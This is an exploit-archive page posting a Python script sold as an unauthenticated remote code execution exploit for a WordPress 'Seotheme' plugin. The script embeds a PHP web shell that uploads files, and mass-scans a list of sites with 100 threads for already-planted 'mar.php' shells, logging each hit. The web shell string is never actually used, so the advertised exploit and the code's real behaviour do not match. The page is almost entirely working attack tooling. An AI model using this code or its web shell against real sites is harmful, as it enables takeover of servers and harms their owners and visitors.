exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress Seotheme Shell Upload

WordPress Seotheme Shell Upload
Posted Feb 9, 2024
Authored by Milad Karimi

WordPress Seotheme plugin suffers from a remote shell upload vulnerability. It is unclear which versions are affected.

tags | exploit, remote, shell
SHA-256 | 1ade388b04da4022b843bad94d8d596ef14c15bcdc9e5ca5ea07315175b097cd

WordPress Seotheme Shell Upload

Change Mirror Download
# Exploit Title: Wordpress Seotheme - Remote Code Execution Unauthenticated
# Date: 2023-09-20
# Author: Milad Karimi (Ex3ptionaL)
# Category : webapps
# Tested on: windows 10 , firefox

import sys , requests, re
from multiprocessing.dummy import Pool
from colorama import Fore
from colorama import init
init(autoreset=True)

fr = Fore.RED
fc = Fore.CYAN
fw = Fore.WHITE
fg = Fore.GREEN
fm = Fore.MAGENTA

shell = """<?php echo "EX"; echo "<br>".php_uname()."<br>"; echo "<form method='post' enctype='multipart/form-data'> <input type='file' name='zb'><input type='submit' name='upload' value='upload'></form>"; if($_POST['upload']) { if(@copy($_FILES['zb']['tmp_name'], $_FILES['zb']['name'])) { echo "eXploiting Done"; } else { echo "Failed to Upload."; } } ?>"""
requests.urllib3.disable_warnings()
headers = {'Connection': 'keep-alive',
'Cache-Control': 'max-age=0',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8',
'referer': 'www.google.com'}
try:
target = [i.strip() for i in open(sys.argv[1], mode='r').readlines()]
except IndexError:
path = str(sys.argv[0]).split('\\')
exit('\n [!] Enter <' + path[len(path) - 1] + '> <sites.txt>')

def URLdomain(site):
if site.startswith("http://") :
site = site.replace("http://","")
elif site.startswith("https://") :
site = site.replace("https://","")
else :
pass
pattern = re.compile('(.*)/')
while re.findall(pattern,site):
sitez = re.findall(pattern,site)
site = sitez[0]
return site


def FourHundredThree(url):
try:
url = 'http://' + URLdomain(url)
check = requests.get(url+'/wp-content/plugins/seoplugins/mar.php',headers=headers, allow_redirects=True,timeout=15)
if '//0x5a455553.github.io/MARIJUANA/icon.png' in check.content:
print ' -| ' + url + ' --> {}[Succefully]'.format(fg)
open('seoplugins-Shells.txt', 'a').write(url + '/wp-content/plugins/seoplugins/mar.php\n')
else:
url = 'https://' + URLdomain(url)
check = requests.get(url+'/wp-content/plugins/seoplugins/mar.php',headers=headers, allow_redirects=True,verify=False ,timeout=15)
if '//0x5a455553.github.io/MARIJUANA/icon.png' in check.content:
print ' -| ' + url + ' --> {}[Succefully]'.format(fg)
open('seoplugins-Shells.txt', 'a').write(url + '/wp-content/plugins/seoplugins/mar.php\n')
else:
print ' -| ' + url + ' --> {}[Failed]'.format(fr)
url = 'http://' + URLdomain(url)
check = requests.get(url+'/wp-content/themes/seotheme/mar.php',headers=headers, allow_redirects=True,timeout=15)
if '//0x5a455553.github.io/MARIJUANA/icon.png' in check.content:
print ' -| ' + url + ' --> {}[Succefully]'.format(fg)
open('seotheme-Shells.txt', 'a').write(url + '/wp-content/themes/seotheme/mar.php\n')
else:
url = 'https://' + URLdomain(url)
check = requests.get(url+'/wp-content/themes/seotheme/mar.php',headers=headers, allow_redirects=True,verify=False ,timeout=15)
if '//0x5a455553.github.io/MARIJUANA/icon.png' in check.content:
print ' -| ' + url + ' --> {}[Succefully]'.format(fg)
open('seotheme-Shells.txt', 'a').write(url + '/wp-content/themes/seotheme/mar.php\n')
else:
print ' -| ' + url + ' --> {}[Failed]'.format(fr)
except :
print ' -| ' + url + ' --> {}[Failed]'.format(fr)

mp = Pool(100)
mp.map(FourHundredThree, target)
mp.close()
mp.join()

print '\n [!] {}Saved in Shells.txt'.format(fc)


Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close